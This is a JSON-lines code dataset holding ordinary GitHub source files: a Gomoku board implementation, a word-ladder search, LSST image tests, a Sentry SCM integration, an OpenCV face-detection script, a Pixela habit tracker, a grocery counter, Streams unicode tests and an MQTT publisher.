is_vacancy\n\n def play_stone(self, move:tuple) -> None:\n '''\n Play a stone at the given coordinate.\n ## Parameters\\n\n move: tuple\n The coordinate of move to be played.\n '''\n if not self.is_legal(move):\n raise ValueError(f'Cannot play a stone at {move}.')\n else:\n self.board[move[0]][move[1]] = self.now_playing\n self.moves.append(move)\n self.update_count(move)\n self.now_playing = -self.now_playing\n return\n \n def update_count(self, move:tuple) -> None:\n for player in (1, -1):\n for group in (self.link3, self.link4, self.link5, self.cross, self.par_cross):\n if move in group[player]:\n group[player].remove(move)\n for group in (self.par_link3, self.par_link4):\n if move in group[player]:\n group[player].remove(move)\n self.par_dir[player][move].clear()\n for i in range(2):\n for j in range(-1, 2):\n if i == 0 and j < 1:\n continue\n l_max, r_max = 0, 0\n l_ext, r_ext = 0, 0\n l_par, r_par = 0, 0\n while True:\n x = move[0] + (l_max - 1) * i\n y = move[1] + (l_max - 1) * j\n if not self.is_inside((x, y)) or self.board[x][y] != self.now_playing:\n if self.is_inside((x, y)):\n if self.board[x][y] == 0:\n x -= i\n y -= j\n while self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n l_ext += 1\n x -= i\n y -= j\n if l_ext == 0 and self.is_inside((x, y)) and self.board[x][y] == 0:\n x -= i\n y -= j\n while self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n l_par += 1\n x -= i\n y -= j\n break\n l_max -= 1\n while True:\n x = move[0] + (r_max + 1) * i\n y = move[1] + (r_max + 1) * j\n if not self.is_inside((x, y)) or self.board[x][y] != self.now_playing:\n if self.is_inside((x, y)):\n if self.board[x][y] == 0:\n x += i\n y += j\n while self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n r_ext += 1\n x += i\n y += j\n if r_ext == 0 and self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n x += i\n y += j\n while self.is_inside((x, y)) and self.board[x][y] == self.now_playing:\n r_par += 1\n x += i\n y += j\n break\n r_max += 1\n\n cnt = r_max - l_max + 1\n for k in range(l_max, r_max + 1):\n x = move[0] + k * i\n y = move[1] + k * j\n self.count[x][y] = max(self.count[x][y], cnt)\n \n l_x = move[0] + (l_max - 1) * i\n l_y = move[1] + (l_max - 1) * j\n ll_x = move[0] + (l_max - 2) * i\n ll_y = move[1] + (l_max - 2) * j\n r_x = move[0] + (r_max + 1) * i\n r_y = move[1] + (r_max + 1) * j\n rr_x = move[0] + (r_max + 2) * i\n rr_y = move[1] + (r_max + 2) * j\n\n if self.is_inside((l_x, l_y)) and self.board[l_x][l_y] == 0:\n for group in (self.par_link3, self.par_link4):\n for player in (1, -1):\n # remove same direction adjacant stone\n if (l_x, l_y) in group and (i, j) in self.par_dir[player][(l_x, l_y)]:\n group[player].remove((l_x, l_y))\n self.par_dir[player][(l_x, l_y)].pop((i, j))\n if len(self.par_dir[player]) + ((l_x, l_y) in self.dir[player]) < 2:\n if (l_x, l_y) in self.par_cross[self.now_playing]:\n self.par_cross[self.now_playing].remove(l_x, l_y)\n\n # add link3/4/5\n # e.g. xxa, xax, xxxa, xxax, xxxax\n if cnt + l_ext >= 4:\n if (l_x, l_y) in self.link4[self.now_playing]:\n self.link4[self.now_playing].remove((l_x, l_y))\n self.link5[self.now_playing].add((l_x, l_y))\n elif cnt + l_ext == 3:\n if (l_x, l_y) in self.link3[self.now_playing]:\n self.link3[self.now_playing].remove((l_x, l_y))\n self.link4[self.now_playing].add((l_x, l_y))\n elif cnt + l_ext == 2:\n self.link3[self.now_playing].add((l_x, l_y))\n if cnt + l_ext >= 2:\n if (l_x, l_y) in self.dir[self.now_playing]:\n if self.dir[self.now_playing][(l_x, l_y)] != (i, j):\n self.cross[self.now_playing].add((l_x, l_y))\n else:\n self.dir[self.now_playing][(l_x, l_y)] = (i, j)\n \n # add partial link3/4\n # e.g. xoax xaox, xxoa, xxoax, xxxoa\n if l_ext == 0:\n if l_par > 0:\n par_dir_dict = self.par_dir[self.now_playing][(l_x, l_y)]\n if cnt + l_par >= 3:\n if (l_x, l_y) in self.par_link3:\n if par_dir_dict.get((i, j), 0) == 3:\n self.par_link3.remove((l_x, l_y))\n self.par_link4[self.now_playing].add((l_x, l_y))\n par_dir_dict[(i, j)] = 4\n elif cnt + l_par == 2:\n self.par_link3[self.now_playing].add((l_x, l_y))\n par_dir_dict[(i, j)] = 3\n else:\n raise ValueError('cnt')\n if len(par_dir_dict) + ((l_x, l_y) in self.dir[self.now_playing]) >= 2:\n self.par_cross[self.now_playing].add((l_x, l_y))\n if self.is_inside((ll_x, ll_y)) and self.board[ll_x][ll_y] == 0:\n par_dir_dict = self.par_dir[self.now_playing][(ll_x, ll_y)]\n if cnt + l_par >= 3:\n if (ll_x, ll_y) in self.par_link3:\n if par_dir_dict.get((i, j), 0) == 3:\n self.par_link3.remove((ll_x, ll_y))\n self.par_link4[self.now_playing].add((ll_x, ll_y))\n par_dir_dict[(i, j)] = 4\n elif cnt + l_par == 2:\n self.par_link3[self.now_playing].add((ll_x, ll_y))\n par_dir_dict[(i, j)] = 3\n if len(par_dir_dict) + ((ll_x, ll_y) in self.dir[self.now_playing]) >= 2:\n self.par_cross[self.now_playing].add((ll_x, ll_y))\n\n del l_x, l_y, ll_x, ll_y, l_max, l_ext, l_par\n\n if self.is_inside((r_x, r_y)) and self.board[r_x][r_y] == 0:\n for group in (self.par_link3, self.par_link4):\n for player in (1, -1):\n # remove same direction adjacant stone\n if (r_x, r_y) in group and (i, j) in self.par_dir[player][(r_x, r_y)]:\n group[player].remove((r_x, r_y))\n self.par_dir[player][(r_x, r_y)].remove((i, j))\n if cnt + r_ext >= 4:\n if (r_x, r_y) in self.link4[self.now_playing]:\n self.link4[self.now_playing].remove((r_x, r_y))\n self.link5[self.now_playing].add((r_x, r_y))\n elif cnt + r_ext == 3:\n if (r_x, r_y) in self.link3[self.now_playing]:\n self.link3[self.now_playing].remove((r_x, r_y))\n self.link4[self.now_playing].add((r_x, r_y))\n elif cnt + r_ext == 2:\n self.link3[self.now_playing].add((r_x, r_y))\n if cnt + r_ext >= 2:\n if (r_x, r_y) in self.dir[self.now_playing]:\n if self.dir[self.now_playing][(r_x, r_y)] != (i, j):\n self.cross[self.now_playing].add((r_x, r_y))\n else:\n self.dir[self.now_playing][(r_x, r_y)] = (i, j)\n\n if r_ext == 0:\n if r_par > 0:\n par_dir_dict = self.par_dir[self.now_playing][(r_x, r_y)]\n if cnt + r_par >= 3:\n if (r_x, r_y) in self.par_link3:\n if par_dir_dict.get((i, j), 0) == 3:\n self.par_link3.remove((r_x, r_y))\n self.par_link4[self.now_playing].add((r_x, r_y))\n par_dir_dict[(i, j)] = 4\n elif cnt + r_par == 2:\n self.par_link3[self.now_playing].add((r_x, r_y))\n par_dir_dict[(i, j)] = 3\n else:\n raise ValueError('cnt')\n if len(par_dir_dict) + ((r_x, r_y) in self.dir[self.now_playing]) >= 2:\n self.par_cross[self.now_playing].add((r_x, r_y))\n if self.is_inside((rr_x, rr_y)) and self.board[rr_x][rr_y] == 0:\n par_dir_dict = self.par_dir[self.now_playing][(rr_x, rr_y)]\n if cnt + r_par >= 3:\n if (rr_x, rr_y) in self.par_link3:\n if par_dir_dict.get((i, j), 0) == 3:\n self.par_link3.remove((rr_x, rr_y))\n self.par_link4[self.now_playing].add((rr_x, rr_y))\n par_dir_dict[(i, j)] = 4\n elif cnt + r_par == 2:\n self.par_link3[self.now_playing].add((rr_x, rr_y))\n par_dir_dict[(i, j)] = 3\n if len(par_dir_dict) + ((rr_x, rr_y) in self.dir[self.now_playing]) >= 2:\n self.par_cross[self.now_playing].add((rr_x, rr_y))\n\n\n def display_board(self) -> None:\n '''\n Print all placed stone.\n '''\n if self.moves == []:\n return\n else:\n i_ticks = ' 0 1 2 3 4 5 6 7 8 9 A B C D E'\n i_ticks = i_ticks[0:1+2*self.size]\n print(i_ticks)\n for j in range(self.size):\n if j < 10:\n print(j, end='')\n else:\n print(chr(55 + j), end='')\n for i in range(self.size):\n print(' ', end='')\n if self.board[i][j] > 0:\n print('o', end='')\n elif self.board[i][j] < 0:\n print('x', end='')\n else:\n print(' ', end='')\n if i == self.size - 1:\n print()\n return\n\n def adjacent_vacancies(self) -> Set[tuple]:\n '''\n ## Returns\\n\n out: Set[tuple]\n A set which contains all available moves around existed stones. \\\n 'Around' means the horizontal AND vertival distance between a vacancy and \\\n the nearest stone is no greater than 1.\n '''\n vacancies = set()\n if self.moves != []:\n bias = range(-1, 2)\n for move in self.moves:\n for i in bias:\n if move[0]-i < 0 or move[0]-i >= self.size:\n continue\n for j in bias:\n if move[1]-j < 0 or move[1]-j >= self.size:\n continue\n vacancies.add((move[0]-i, move[1]-j))\n\n if self.board[move[0]][move[1]] == self.now_playing:\n for i in [-1, 1]:\n if move[0]-i < 0 or move[0]-i >= self.size:\n continue\n for j in [-1, 1]:\n if move[1]-j < 0 or move[1]-j >= self.size:\n continue\n vacancies.add((move[0]-i, move[1]-j))\n for i, j in [(0, 2), (0, -2), (2, 0), (-2, 0)]:\n if move[0]-i < 0 or move[0]-i >= self.size:\n continue\n if move[1]-j < 0 or move[1]-j >= self.size:\n continue\n vacancies.add((move[0]-i, move[1]-j))\n occupied = set(self.moves)\n vacancies -= occupied\n return vacancies\n\n def is_ended(self) -> bool:\n '''\n Judge whether the game is ended or not. The winner will be passed to `self.winner`. \\\n The algorithm is not easy to understand. You can check it by traverse the `for` loop.\n ## Returns\\n\n out: bool\n Return `True` if the game ended, otherwise `False`.\n '''\n if self.moves == []:\n return False\n loc_i, loc_j = self.moves[-1]\n color = -self.now_playing\n sgn_i = [1, 0, 1, 1]\n sgn_j = [0, 1, 1, -1]\n for iter in range(4):\n length = 0\n prm1 = loc_i if sgn_i[iter] == 1 else loc_j\n prm2 = loc_j if sgn_j[iter] == 1 else (loc_i if sgn_j[iter] == 0 else self.size - 1 - loc_j)\n start_bias = -min(prm1, prm2) if min(prm1, prm2) < self.win_len-1 else -self.win_len+1\n end_bias = self.size - 1 - max(prm1, prm2) if max(prm1, prm2) > self.size-self.win_len else self.win_len-1\n for k in range(start_bias, end_bias+1):\n stone = self.board[loc_i + k * sgn_i[iter]][loc_j + k * sgn_j[iter]]\n if color > 0 and stone > 0 or color < 0 and stone < 0:\n length += 1\n else:\n length = 0\n if length == self.win_len:\n self.winner = 1 if color > 0 else -1\n return True\n if len(self.moves) == self.size ** 2:\n return True\n else:\n return False","repo_name":"ChillingDream/AlphaGomoku","sub_path":"ChessBoard.py","file_name":"ChessBoard.py","file_ext":"py","file_size_in_byte":17623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72050521526","text":"answer = 1e9\n\n\ndef is_same_inner_value(a_list, b_list):\n for a, b in zip(a_list, b_list):\n if a != b:\n return False\n return True\n\n\ndef dfs(d, b, t, w, v):\n global answer\n if is_same_inner_value(b, t):\n answer = min(d, answer)\n return\n for word in w:\n for i in range(len(b)):\n if b[i] != word[i]:\n temp = b[i]\n b[i] = word[i]\n str_b = ''.join(b)\n if str_b in w and str_b not in v:\n v.add(str_b)\n dfs(d + 1, b, t, w, v)\n b[i] = temp\n\n\ndef solution(begin, target, words):\n if target not in words:\n return 0\n words.remove(target)\n words.insert(0, target)\n dfs(0, list(begin), list(target), words, set())\n return answer","repo_name":"algorithm-studyy/algorithm","sub_path":"jiwon/programmers/python/change_word.py","file_name":"change_word.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37687709030","text":"import unittest\n\nimport lsst.utils.tests\nfrom lsst.daf.base import PropertyList\nfrom lsst.obs.base import exposureFromImage\nimport lsst.afw.image as afwImage\n\n\nclass ExposureFromImageTestCase(lsst.utils.tests.TestCase):\n \"\"\"A test case for exposureFromImage.\"\"\"\n\n def setUp(self):\n self.maskedImage = makeRampMaskedImage(10, 11)\n\n def tearDown(self):\n del self.maskedImage\n\n def testDecoratedImage(self):\n image = self.maskedImage.getImage()\n decoImage = afwImage.DecoratedImageF(image)\n metadata = PropertyList()\n metadata.set(\"FOO\", \"BAR\")\n decoImage.setMetadata(metadata)\n exposure = exposureFromImage(decoImage)\n self.assertImagesEqual(exposure.getMaskedImage().getImage(), image)\n md = exposure.getMetadata()\n self.assertEqual(md.getScalar(\"FOO\"), \"BAR\")\n\n def testExposure(self):\n inExposure = afwImage.ExposureF(self.maskedImage)\n outExposure = exposureFromImage(inExposure)\n self.assertIs(inExposure, outExposure)\n\n def testImage(self):\n image = self.maskedImage.getImage()\n exposure = exposureFromImage(image)\n self.assertImagesEqual(image, exposure.getMaskedImage().getImage())\n\n def testMaskedImage(self):\n exposure = exposureFromImage(self.maskedImage)\n self.assertMaskedImagesEqual(self.maskedImage, exposure.getMaskedImage())\n\n def testDecoratedImageBadWcs(self):\n \"\"\"Test that exposureFromImage() attaches a None wcs to the exposure\n when the WCS cannot be constructed\n \"\"\"\n image = self.maskedImage.getImage()\n decoImage = afwImage.DecoratedImageF(image)\n metadata = PropertyList()\n metadata.set(\"CTYPE1\", \"RA---TPV\")\n metadata.set(\"CTYPE2\", \"DEC--TPV\")\n decoImage.setMetadata(metadata)\n exposure = exposureFromImage(decoImage)\n self.assertIs(exposure.getWcs(), None)\n\n\ndef makeRampMaskedImage(width, height, imgClass=afwImage.MaskedImageF):\n \"\"\"Make a ramp image of the specified size and image class\n\n Image values start from 0 at the lower left corner and increase by 1 along\n rows. Variance values equal image values + 100.\n Mask values equal image values modulo 8 bits (leaving plenty of unused\n values).\n \"\"\"\n mi = imgClass(width, height)\n image = mi.getImage()\n mask = mi.getMask()\n variance = mi.getVariance()\n val = 0\n for yInd in range(height):\n for xInd in range(width):\n image[xInd, yInd, afwImage.LOCAL] = val\n variance[xInd, yInd, afwImage.LOCAL] = val + 100\n mask[xInd, yInd, afwImage.LOCAL] = val % 0x100\n val += 1\n return mi\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n pass\n\n\ndef setup_module(module):\n lsst.utils.tests.init()\n\n\nif __name__ == \"__main__\":\n lsst.utils.tests.init()\n unittest.main()\n","repo_name":"gcmshadow/obs_base","sub_path":"tests/test_exposureFromImage.py","file_name":"test_exposureFromImage.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14283347889","text":"#!/usr/bin/env python3\n#pylint: disable=C0103\n\n# Douglas Klos\n# March 7th, 2019\n# Python 210, Extra\n# run_timer_context.py\n\n\"\"\" Run file for context manager testing \"\"\"\n\nimport io\nimport time\nfrom contextlib import contextmanager\nimport timer_context as tc\n\n\n@contextmanager\ndef local_timer(out_file, name=''):\n \"\"\" Context manager that returns execution time \"\"\"\n local_time = time.time()\n try:\n yield local_time\n finally:\n local_time = time.time() - local_time\n out_file.write(f'{name} execution took {local_time} seconds')\n\n\ndef timer_test():\n \"\"\" Runs a loop with context manager and prints execution time \"\"\"\n outfile = io.StringIO()\n\n with tc.Timer(outfile, 'timer_test'):\n for i in range(1000000):\n i = i ** 20\n\n print(outfile.getvalue())\n\n\ndef timer_test2():\n \"\"\" Runs a loop with context manager and prints execution time \"\"\"\n outfile = io.StringIO()\n\n with local_timer(outfile, 'timer_test2'):\n for i in range(1000000):\n i = i ** 20\n\n print(outfile.getvalue())\n\n\ndef main():\n \"\"\" Main, calls different tests \"\"\"\n timer_test()\n timer_test2()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"UWPCE-PythonCert-ClassRepos/GP_Python210B_Winter_2019","sub_path":"students/douglas_klos/extra/context/timer/run_timer_context.py","file_name":"run_timer_context.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73987324406","text":"from __future__ import annotations\n\nfrom uuid import uuid4\n\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom rest_framework.request import Request\nfrom rest_framework.response import Response\n\nfrom sentry.constants import ObjectStatus\nfrom sentry.integrations import (\n FeatureDescription,\n IntegrationFeatures,\n IntegrationInstallation,\n IntegrationMetadata,\n IntegrationProvider,\n)\nfrom sentry.integrations.mixins import RepositoryMixin\nfrom sentry.models.repository import Repository\nfrom sentry.pipeline import PipelineView\nfrom sentry.web.helpers import render_to_response\n\nfrom .repository import CustomSCMRepositoryProvider\n\nDESCRIPTION = \"\"\"\nCustom Source Control Management (SCM)\n\"\"\"\n\nFEATURES = [\n FeatureDescription(\n \"\"\"\n Send your own commits\n \"\"\",\n IntegrationFeatures.COMMITS,\n ),\n FeatureDescription(\n \"\"\"\n Stack trace linky dink\n \"\"\",\n IntegrationFeatures.STACKTRACE_LINK,\n ),\n]\n\nmetadata = IntegrationMetadata(\n description=DESCRIPTION.strip(),\n features=FEATURES,\n author=\"The Sentry Team\",\n noun=_(\"Installation\"),\n issue_url=\"https://github.com/getsentry/sentry/issues/\",\n source_url=\"https://github.com/getsentry/sentry/tree/master/src/sentry/integrations/custom_scm\",\n aspects={},\n)\n\n\nclass CustomSCMIntegration(IntegrationInstallation, RepositoryMixin):\n def get_client(self):\n pass\n\n def get_stacktrace_link(\n self, repo: Repository, filepath: str, default: str, version: str\n ) -> str | None:\n \"\"\"\n We don't have access to verify that the file does exists\n (using `check_file`) so instead we just return the\n formatted source url using the default branch provided.\n \"\"\"\n return self.format_source_url(repo, filepath, default)\n\n def format_source_url(self, repo: Repository, filepath: str, branch: str) -> str:\n # This format works for GitHub/GitLab, not sure if it would\n # need to change for a different provider\n return f\"{repo.url}/blob/{branch}/{filepath}\"\n\n def get_repositories(self, query=None):\n \"\"\"\n Used to get any repositories that are not already tied\n to an integration.\n \"\"\"\n repos = Repository.objects.filter(\n organization_id=self.organization_id,\n provider__isnull=True,\n integration_id__isnull=True,\n status=ObjectStatus.VISIBLE,\n )\n return [{\"name\": repo.name, \"identifier\": str(repo.id)} for repo in repos]\n\n\nclass InstallationForm(forms.Form):\n name = forms.CharField(\n label=_(\"Name\"),\n help_text=_(\n \"The name for your integration.\"\n \"
    \"\n \"If you are using GitHub, use the organization name.\"\n ),\n )\n url = forms.CharField(\n label=_(\"URL\"),\n help_text=_(\n \"The base URL for your instance, including the host and protocol. \"\n \"
    \"\n \"If using github.com, enter https://github.com/\"\n ),\n widget=forms.TextInput(attrs={\"placeholder\": \"https://github.com/\"}),\n )\n\n\nclass InstallationConfigView(PipelineView):\n def dispatch(self, request: Request, pipeline) -> Response:\n if request.method == \"POST\":\n form = InstallationForm(request.POST)\n if form.is_valid():\n form_data = form.cleaned_data\n\n pipeline.bind_state(\"installation_data\", form_data)\n\n return pipeline.next_step()\n else:\n form = InstallationForm()\n\n return render_to_response(\n template=\"sentry/integrations/custom-scm-config.html\",\n context={\"form\": form},\n request=request,\n )\n\n\nclass CustomSCMIntegrationProvider(IntegrationProvider):\n key = \"custom_scm\"\n name = \"Custom Source Control Management (SCM)\"\n requires_feature_flag = True\n metadata = metadata\n integration_cls = CustomSCMIntegration\n features = frozenset(\n [\n IntegrationFeatures.COMMITS,\n IntegrationFeatures.STACKTRACE_LINK,\n IntegrationFeatures.CODEOWNERS,\n ]\n )\n\n def get_pipeline_views(self):\n return [InstallationConfigView()]\n\n def build_integration(self, state):\n name = state[\"installation_data\"][\"name\"]\n url = state[\"installation_data\"][\"url\"]\n # normally the external_id would be something unique\n # across organizations, but for now there can just be\n # separate integrations for separate organizations\n external_id = uuid4().hex\n\n return {\n \"name\": name,\n \"external_id\": external_id,\n \"metadata\": {\"domain_name\": f\"{url}{name}\"},\n }\n\n def setup(self):\n from sentry.plugins.base import bindings\n\n bindings.add(\n \"integration-repository.provider\",\n CustomSCMRepositoryProvider,\n id=\"integrations:custom_scm\",\n )\n","repo_name":"gms-ws-sandbox/sentry","sub_path":"src/sentry/integrations/custom_scm/integration.py","file_name":"integration.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"919253037","text":"\n\nimport requests\nimport cv2\nimport numpy as np\n\nface_detect = cv2.CascadeClassifier(\"/root/Desktop/jupyter/haarcascade_frontalface_default.xml\")\ncap=cv2.VideoCapture(0)\nurl =\"http://100.107.5.216:8080/shot.jpg\"\n\nwhile True:\n geturl=requests.get(url)\n photoweb=geturl.content\n photobyte=bytearray(photoweb)\n image=np.array(photobyte)\n frame=cv2.imdecode(image,-1)\n ret,photo=cap.read()\n faces = face_detect.detectMultiScale(photo)\n if faces is not ():\n \n x=faces[0][0]\n y=faces[0][1]\n w=faces[0][2]\n h=faces[0][3]\n #photo=cv2.rectangle(photo,(x,y),(x+w,y+h),(0,255,0),4)\n r_photo=photo[y-20:y+h+20,x-20:x+w+20]\n resize=cv2.resize(r_photo,(200,200))\n photo[0:200,0:200]=resize\n \n cv2.imshow(\"hi\",frame)\n cv2.imshow(\"hi\",photo)\n if cv2.waitKey(1)==13:\n break\ncv2.destroyAllWindows()\ncap.release()\n\n\n","repo_name":"surajsolanki724/LinuxWorld-Training","sub_path":"phone_detect.py","file_name":"phone_detect.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"36430448618","text":"import requests\nimport datetime\n\npixela_endpoint = \"https://pixe.la/v1/users\"\nUSERNAME = \"USERNAME\"\nTOKEN = \"TOKEN\"\n\nuser_params = {\n\n \"token\": TOKEN,\n \"username\" : USERNAME,\n \"agreeTermsOfService\": \"yes\",\n \"notMinor\" : \"yes\"\n}\n\n# response = requests.post(url = pixela_endpoint, json=user_params)\n# print(response.text)\n\ngraph_endpoint = f\"{pixela_endpoint}/{USERNAME}/graphs\"\n\ngraph_config = {\n\n \"id\" : \"graph1\",\n \"name\": \"Piano Graph\",\n \"unit\": \"Hours\",\n \"type\": \"int\",\n \"color\": \"sora\"\n}\n\nheaders = {\n\n \"X-USER-TOKEN\" : TOKEN\n}\n\n# response = requests.post(url = graph_endpoint, json= graph_config, headers = headers)\n# print(response.text)\n\nvalue_endpoint = f\"{graph_endpoint}/graph1\"\n\ntoday = datetime.datetime.now( )\n# print(today)\nvalue_params = {\n\n \"date\": today.strftime(\"%Y%m%d\"),\n \"quantity\": \"1\"\n}\n# response = requests.post(url = value_endpoint, json= value_params, headers = headers)\n# print(response.text)\n\nupdate_endpoint = f\"{value_endpoint}/{today.strftime('%Y%m%d')}\"\n\n# response = requests.put(url = update_endpoint, json=value_params,headers=headers)\n# print(response.text)\n\nresponse= requests.delete(url=update_endpoint, headers=headers)\nprint(response.text)\n","repo_name":"NinjaNekoSama/Habit-Tracker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13930400991","text":"from __future__ import print_function\nimport unittest\n\nfrom streamsx.topology.topology import *\nfrom streamsx.topology.tester import Tester\nfrom streamsx.topology import context\nfrom streamsx.topology.context import ConfigParams\nfrom streamsx import rest\nimport streamsx.ec as ec\n\n\nimport test_vers\n\n@unittest.skipIf(not test_vers.tester_supported() , \"Tester not supported\")\nclass TestUnicode(unittest.TestCase):\n def setUp(self):\n Tester.setup_standalone(self)\n\n def test_strings(self):\n \"\"\" Test strings that are unicode.\n Includes a stream name to verify it\n does not cause an error, but under the covers\n the actual name will be a mangled version of it\n since SPL identifiers are only ASCII.\n \"\"\"\n topo = Topology()\n ud = []\n ud.append(u'⡍⠔⠙⠖ ⡊ ⠙⠕⠝⠰⠞ ⠍⠑⠁⠝ ⠞⠕ ⠎⠁⠹ ⠹⠁⠞ ⡊ ⠅⠝⠪⠂ ⠕⠋ ⠍⠹')\n ud.append(u'2H₂ + O₂ ⇌ 2H₂O, R = 4.7 kΩ, ⌀ 200 mm')\n ud.append(u'многоязычных')\n ud.append(\"Arsenal hammered 5-1 by Bayern again\")\n s = topo.source(ud, name=u'façade')\n sas = s.as_string()\n sd = s.map(lambda s : {'val': s + u\"_test_it!\"})\n tester = Tester(topo)\n tester.contents(s, ud)\n tester.contents(sas, ud)\n dud = []\n for v in ud:\n dud.append({'val': v + u\"_test_it!\"})\n tester.contents(sd, dud)\n\n tester.test(self.test_ctxtype, self.test_config)\n print(tester.result)\n\n def test_view_name(self):\n \"\"\"\n Test view names that are unicode.\n \"\"\"\n if self.test_ctxtype == context.ContextTypes.STANDALONE:\n return self.skipTest(\"Skipping unicode view tests for standalone.\")\n view_names = [u\"®®®®\", u\"™¬⊕⇔\"]\n topo = Topology()\n\n view0 = topo.source([\"hello\"]).view(name=view_names[0])\n view1 = topo.source([\"view!\"]).view(name=view_names[1])\n\n self.tester = Tester(topo)\n self.tester.local_check = self._check_view_names\n\n self.tester.test(self.test_ctxtype, self.test_config)\n\n def _check_view_names(self):\n job = self.tester.submission_result.job\n view_names = []\n for view in job.get_views():\n view_names.append(view.name)\n self.assertIn(u\"®®®®\", view_names)\n self.assertIn(u\"™¬⊕⇔\", view_names)\n\n@unittest.skipIf(not test_vers.tester_supported() , \"Tester not supported\")\nclass TestDistributedUnicode(TestUnicode):\n def setUp(self):\n Tester.setup_distributed(self)\n\n # Get username and password\n username = os.getenv(\"STREAMS_USERNAME\", \"streamsadmin\")\n password = os.getenv(\"STREAMS_PASSWORD\", \"passw0rd\")\n\n self.sc = rest.StreamsConnection(username=username, password=password)\n\n # Disable SSL verification\n self.sc.session.verify = False\n self.test_config[ConfigParams.STREAMS_CONNECTION] = self.sc\n\n@unittest.skipIf(not test_vers.tester_supported() , \"Tester not supported\")\nclass TestBluemixUnicode(TestUnicode):\n def setUp(self):\n Tester.setup_streaming_analytics(self, force_remote_build=True)\n vcap = self.test_config.get('topology.service.vcap')\n sn = self.test_config.get('topology.service.name')\n self.sc = rest.StreamingAnalyticsConnection(vcap, sn)\n","repo_name":"wmarshall484/streamsx.topology","sub_path":"test/python/topology/test2_unicode.py","file_name":"test2_unicode.py","file_ext":"py","file_size_in_byte":3391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"21985616679","text":"import re\r\nimport string\r\n\r\n#Option 1\r\ndef ListItemPurchased(): \r\n\r\n listPurchased = open('GroceryItems.txt') #Opens GroceryItems list\r\n\r\n contentsRead = listPurchased.read() #Reads GroceryItems\r\n\r\n items = contentsRead.split()\r\n\r\n itemsBought = [] #List that stores the items bought from GroceryItems\r\n\r\n for item in items: #For loop that add items to ItemsBought\r\n if item not in itemsBought:\r\n itemsBought.append(item)\r\n\r\n itemsBought.sort() #Sorts itemsBought\r\n\r\n for items in itemsBought:\r\n print(contentsRead.count(items), items) #Prints a list with a numerical value from ItemsBought\r\n \r\n\r\n return 0\r\n\r\n\r\n#Option 2\r\ndef ItemsList():\r\n listPurchased = open('GroceryItems.txt') #Opens GroceryItems list\r\n\r\n contentsRead = listPurchased.read() #Reads GroceryItems\r\n\r\n items = contentsRead.split()\r\n\r\n itemsBought = []\r\n\r\n for item in items:\r\n if item not in itemsBought:\r\n itemsBought.append(item)\r\n\r\n itemsBought.sort()\r\n\r\n listToStr = '\\n'.join(map(str, itemsBought)) #Joins the itemsBought list into a more legible list for the user to see and read\r\n\r\n print(listToStr)\r\n\r\ndef SpecificItem(k):\r\n\r\n listPurchased = open('GroceryItems.txt') #Opens GroceryItems list\r\n\r\n contentsRead = listPurchased.read() #Reads GroceryItems\r\n\r\n items = contentsRead.split()\r\n\r\n itemsBought = []\r\n\r\n for item in items:\r\n if item not in itemsBought:\r\n itemsBought.append(item)\r\n\r\n itemsBought.sort()\r\n\r\n if k in itemsBought:\r\n print(contentsRead.count(k), k, \"were purchased today\") #Gets the user input from C++ and tells the user how many of that item was purchased on the given day\r\n\r\n if k not in itemsBought:\r\n print(\"Invalid Item\") #User input was not found on list, so returns an error.\r\n\r\n return 0\r\n\r\n#Option 3\r\ndef Histogram():\r\n listPurchased = open('GroceryItems.txt') #Opens GroceryItems list\r\n\r\n contentsRead = listPurchased.read() #Reads GroceryItems\r\n\r\n items = contentsRead.split()\r\n\r\n itemsBought = []\r\n\r\n for item in items:\r\n if item not in itemsBought:\r\n itemsBought.append(item)\r\n\r\n itemsBought.sort()\r\n\r\n #For loop for the creation of the Histogram\r\n for items in itemsBought: \r\n itemCount = contentsRead.count(items)\r\n output = ''\r\n while(itemCount > 0):\r\n output += '*' #Print '*' for every item in the list\r\n itemCount -= 1\r\n print(items.ljust(13), output)\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"SerchMat/CS-210","sub_path":"Project 3/Release/PythonCode.py","file_name":"PythonCode.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26424401895","text":"import datetime\r\nimport time\r\n\r\nimport paho.mqtt.client as mqtt\r\nimport json\r\n\r\nwhile True:\r\n try:\r\n\r\n t_format = '%m-%d %H:%M'\r\n t = datetime.datetime.now().strftime(t_format)\r\n payload = {\"Tiem\": t, \"Name\": \"Berlin\"}\r\n\r\n client = mqtt.Client(client_id=\"berlin\")\r\n client.username_pw_set('chen', '0000')\r\n client.connect('140.112.94.129', 20010, 60)\r\n\r\n client.publish(\"mqtt_class/test\", json.dumps(payload))\r\n print(payload)\r\n time.sleep(30)\r\n\r\n except Exception as exc:\r\n print(exc)\r\n\r\n\r\n\r\n\r\n","repo_name":"berlin0308/PORTFOLIO","sub_path":"Research_Projects/LAB_Practices/RPI/MQTT_pub_Test.py","file_name":"MQTT_pub_Test.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} 